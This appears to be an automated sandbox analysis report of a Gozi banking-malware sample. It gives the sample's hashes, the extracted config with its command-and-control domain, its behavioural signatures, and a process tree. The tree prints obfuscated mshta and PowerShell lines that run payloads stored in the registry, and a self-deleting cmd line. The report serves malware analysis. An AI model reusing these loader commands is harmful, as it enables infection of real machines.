Analysis
-
max time kernel
151s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
13-10-2023 14:47
Static task
static1
Behavioral task
behavioral1
Sample
Azienda.url
Resource
win7-20230831-en
General
-
Target
Azienda.url
-
Size
193B
-
MD5
385b2d1cc0f48c9b113009619258b210
-
SHA1
2a956120277957bf6b11ec05568e148cb1c0bc7c
-
SHA256
589deb6665a90960cfbe3db62f3477f9a2087a2b2eb03d1a19ea69374a9eb34e
-
SHA512
a82d7f78c72d8ba1849473a7ac2536e1c332289fbdf11c6ea6f5de6f182208871a4ccb59a0f5facccdd6d0c78e9c9e10dcfe4aa067426fe0ce69358477364e18
Malware Config
Extracted
gozi
Extracted
gozi
5050
fotexion.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
fotexion.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 65 1600 rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
rundll32.exemshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation mshta.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 1600 rundll32.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 4328 set thread context of 700 4328 powershell.exe Explorer.EXE PID 700 set thread context of 3716 700 Explorer.EXE RuntimeBroker.exe PID 700 set thread context of 3948 700 Explorer.EXE RuntimeBroker.exe PID 700 set thread context of 4584 700 Explorer.EXE RuntimeBroker.exe PID 700 set thread context of 1860 700 Explorer.EXE cmd.exe PID 700 set thread context of 4104 700 Explorer.EXE RuntimeBroker.exe PID 1860 set thread context of 4604 1860 cmd.exe PING.EXE PID 700 set thread context of 4572 700 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000_Classes\Local Settings rundll32.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 4604 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
rundll32.exepowershell.exeExplorer.EXEpid process 1600 rundll32.exe 1600 rundll32.exe 4328 powershell.exe 4328 powershell.exe 4328 powershell.exe 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 700 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 4328 powershell.exe 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 700 Explorer.EXE 1860 cmd.exe 700 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 4328 powershell.exe Token: SeShutdownPrivilege 700 Explorer.EXE Token: SeCreatePagefilePrivilege 700 Explorer.EXE Token: SeShutdownPrivilege 700 Explorer.EXE Token: SeCreatePagefilePrivilege 700 Explorer.EXE Token: SeShutdownPrivilege 700 Explorer.EXE Token: SeCreatePagefilePrivilege 700 Explorer.EXE Token: SeShutdownPrivilege 700 Explorer.EXE Token: SeCreatePagefilePrivilege 700 Explorer.EXE Token: SeShutdownPrivilege 700 Explorer.EXE Token: SeCreatePagefilePrivilege 700 Explorer.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
rundll32.exepid process 2000 rundll32.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 700 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 700 Explorer.EXE -
Suspicious use of WriteProcessMemory 53 IoCs
Processes:
rundll32.execontrol.exerundll32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 2000 wrote to memory of 2792 2000 rundll32.exe control.exe PID 2000 wrote to memory of 2792 2000 rundll32.exe control.exe PID 2792 wrote to memory of 760 2792 control.exe rundll32.exe PID 2792 wrote to memory of 760 2792 control.exe rundll32.exe PID 760 wrote to memory of 1600 760 rundll32.exe rundll32.exe PID 760 wrote to memory of 1600 760 rundll32.exe rundll32.exe PID 760 wrote to memory of 1600 760 rundll32.exe rundll32.exe PID 3772 wrote to memory of 4328 3772 mshta.exe powershell.exe PID 3772 wrote to memory of 4328 3772 mshta.exe powershell.exe PID 4328 wrote to memory of 4384 4328 powershell.exe csc.exe PID 4328 wrote to memory of 4384 4328 powershell.exe csc.exe PID 4384 wrote to memory of 3376 4384 csc.exe cvtres.exe PID 4384 wrote to memory of 3376 4384 csc.exe cvtres.exe PID 4328 wrote to memory of 2728 4328 powershell.exe csc.exe PID 4328 wrote to memory of 2728 4328 powershell.exe csc.exe PID 2728 wrote to memory of 2968 2728 csc.exe cvtres.exe PID 2728 wrote to memory of 2968 2728 csc.exe cvtres.exe PID 4328 wrote to memory of 700 4328 powershell.exe Explorer.EXE PID 4328 wrote to memory of 700 4328 powershell.exe Explorer.EXE PID 4328 wrote to memory of 700 4328 powershell.exe Explorer.EXE PID 4328 wrote to memory of 700 4328 powershell.exe Explorer.EXE PID 700 wrote to memory of 3716 700 Explorer.EXE RuntimeBroker.exe PID 700 wrote to memory of 3716 700 Explorer.EXE RuntimeBroker.exe PID 700 wrote to memory of 3716 700 Explorer.EXE RuntimeBroker.exe PID 700 wrote to memory of 3716 700 Explorer.EXE RuntimeBroker.exe PID 700 wrote to memory of 3948 700 Explorer.EXE RuntimeBroker.exe PID 700 wrote to memory of 3948 700 Explorer.EXE RuntimeBroker.exe PID 700 wrote to memory of 1860 700 Explorer.EXE cmd.exe PID 700 wrote to memory of 1860 700 Explorer.EXE cmd.exe PID 700 wrote to memory of 1860 700 Explorer.EXE cmd.exe PID 700 wrote to memory of 3948 700 Explorer.EXE RuntimeBroker.exe PID 700 wrote to memory of 3948 700 Explorer.EXE RuntimeBroker.exe PID 700 wrote to memory of 4584 700 Explorer.EXE RuntimeBroker.exe PID 700 wrote to memory of 4584 700 Explorer.EXE RuntimeBroker.exe PID 700 wrote to memory of 4584 700 Explorer.EXE RuntimeBroker.exe PID 700 wrote to memory of 4584 700 Explorer.EXE RuntimeBroker.exe PID 700 wrote to memory of 4104 700 Explorer.EXE RuntimeBroker.exe PID 700 wrote to memory of 4104 700 Explorer.EXE RuntimeBroker.exe PID 700 wrote to memory of 1860 700 Explorer.EXE cmd.exe PID 700 wrote to memory of 4104 700 Explorer.EXE RuntimeBroker.exe PID 700 wrote to memory of 1860 700 Explorer.EXE cmd.exe PID 700 wrote to memory of 4104 700 Explorer.EXE RuntimeBroker.exe PID 700 wrote to memory of 4572 700 Explorer.EXE cmd.exe PID 700 wrote to memory of 4572 700 Explorer.EXE cmd.exe PID 700 wrote to memory of 4572 700 Explorer.EXE cmd.exe PID 700 wrote to memory of 4572 700 Explorer.EXE cmd.exe PID 1860 wrote to memory of 4604 1860 cmd.exe PING.EXE PID 1860 wrote to memory of 4604 1860 cmd.exe PING.EXE PID 1860 wrote to memory of 4604 1860 cmd.exe PING.EXE PID 1860 wrote to memory of 4604 1860 cmd.exe PING.EXE PID 1860 wrote to memory of 4604 1860 cmd.exe PING.EXE PID 700 wrote to memory of 4572 700 Explorer.EXE cmd.exe PID 700 wrote to memory of 4572 700 Explorer.EXE cmd.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3716
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4584
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3948
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:700 -
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Azienda.url2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\QHTO49S3\modulo[1].cpl",3⤵
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\QHTO49S3\modulo[1].cpl",4⤵
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\QHTO49S3\modulo[1].cpl",5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1600
-
-
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Twfk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Twfk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2D69E7DB-A838-E7C3-1AB1-5C0BEE75506F\\\MemoryMusic'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name dstpgbnjwj -value gp; new-alias -name salqpeaiqc -value iex; salqpeaiqc ([System.Text.Encoding]::ASCII.GetString((dstpgbnjwj "HKCU:Software\AppDataLow\Software\Microsoft\2D69E7DB-A838-E7C3-1AB1-5C0BEE75506F").LinkAbout))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s325ijrr\s325ijrr.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8B53.tmp" "c:\Users\Admin\AppData\Local\Temp\s325ijrr\CSC21EDB301573E49CDACDBB18E7ADF196.TMP"5⤵PID:3376
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\edvjprse\edvjprse.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8C9B.tmp" "c:\Users\Admin\AppData\Local\Temp\edvjprse\CSC9C50E2D6307E4B93A83C62C43130CD45.TMP"5⤵PID:2968
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\QHTO49S3\modulo[1].cpl"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:4604
-
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:4572
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4104
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
206KB
MD572e2a5c797954e895a41be5b20f867b2
SHA1419aacfb3ccea9b08277bcc9405054fa4238a597
SHA256858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0
SHA51277be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3
-
Filesize
206KB
MD572e2a5c797954e895a41be5b20f867b2
SHA1419aacfb3ccea9b08277bcc9405054fa4238a597
SHA256858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0
SHA51277be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3
-
Filesize
1KB
MD5e331236dff206d94c475e189118c7b5f
SHA17a93c8bc40e18e885e20cbbbcfc735f2ff438f80
SHA2568541835f60da68ac1f6b1c3ce962b466920944b91d74d35359dbddc9963a830f
SHA51209eb1e905fabde2ab0144489fa480176b7f399401c259ee17fac4c35f9fdf77a28f758be712c89b69276a7ee0d33084a23f1f1b89fa16e17cc6a3de5a74f9b09
-
Filesize
1KB
MD5738464c66dbccfd0fb1b4b418d230cf5
SHA164ecac4f44d2f70586812401c8ee769b132c4b36
SHA256b8f9315c0e0856ce4bc9190f934e3acab9f7ec375edbfbc26a2202b447549513
SHA5129611ec37b5e177aee775b51db20d24625ce9cad6e9732c400ec031dbe2b6b5ce8bf5af030bc39d3168316193c4e5f51a646c344489ea99282033146bdde7deb2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD57757e60b02dcab11e514f6d4ccffdfb5
SHA1900246ea84cc3decee36cc33dad0e47f1e86b0c2
SHA256ed9b9bd4649aa6382bb25e79c9f64c6f9f8dd3fcf43f8631ce9d3cb63eb87866
SHA51229e78bd31d26a83edd528e94abaa642cdab5a98125a2d1c16021cd48e34b580c8839e4c104b8e4e4fc7b05ddb3fb5f2cde531cef8ef5ecdc623dcf2762de0dd6
-
Filesize
3KB
MD52809293931a5f224523ae64d9db67ae8
SHA1578392be5f11089fa9a2b2438df7af51f875df04
SHA256c6eb6ab157632ef718ed76fff4454d068adc743c043b6bdab3422b00d20caee5
SHA512f93d2c52166d86817db7eac7f268d2d049b6dd177648c743f92d6bd361e3f5c5f6155bf60381463744a3c85c8f30839d0bd16c132616f3e908ceb9b45dfa6776
-
Filesize
652B
MD5a6da7051133952631fab2b5eb8aae475
SHA12025c4eeeeedef354d246aa0ea33ff87d65505f4
SHA256e4f3bb4fdb2bf0256e8c1bacb85ad8b9a17c255dff52759f2858e0ba1992d9be
SHA512d122cee889996b58df2f805a6202286ec0d56d262ca9c5ac00fcab8a820145b88010ef10e48384acbf0499b92071e1e0c3354abe619856e9c6cacea13986546a
-
Filesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
Filesize
369B
MD5fed69601073ef4749c161dc45faa9407
SHA146bb6a992a7df9edf16b0efe2f89b7cff2197abc
SHA256911cf779e42ebe82df6e929c50241947f95d9ebe6e49fd4d4402ba0eb8f8f0f3
SHA512c2d5e500d85d0458c1835f33e1dfc4fc45d1dcdf52d842e0daa75bf5aaa5b43df55783e90c4b354fa0d166f43752ab060e4805839485a2305b054bfb677ea2ab
-
Filesize
652B
MD5e0d46e1b99f39000db66a97b816b0710
SHA1c1da5d13b37c13221eab84cd340a06267944c1de
SHA2563c337fb0341541f712a1eca40a48a159b6ca0c5c6602f4f508de2b07bcbd7a91
SHA512a6074545716ef28f6b0c9992a0143b3338ad9d34449db733eea40875cba964e05f313645023d4314b65206d5cf6d62cdc21d2af8659f7f583a358cfbf1c31416
-
Filesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
Filesize
369B
MD5580a073a2bb241de9e4afbdd23ac58b8
SHA1d5d3bc87d9e652ceb7df531668a83a46aa179c44
SHA256113eba9ea3db33e6489cac064b0094bcc8a494f4b12ec3c9be72116a49a821ea
SHA5125e6f2bf6ed087ed96e3967f044b48752fa878c955da9f42e82ccebb55ad93e317236566fcf269682d9650b95133be676caf3c9f3195021c346d4fb2de50e0483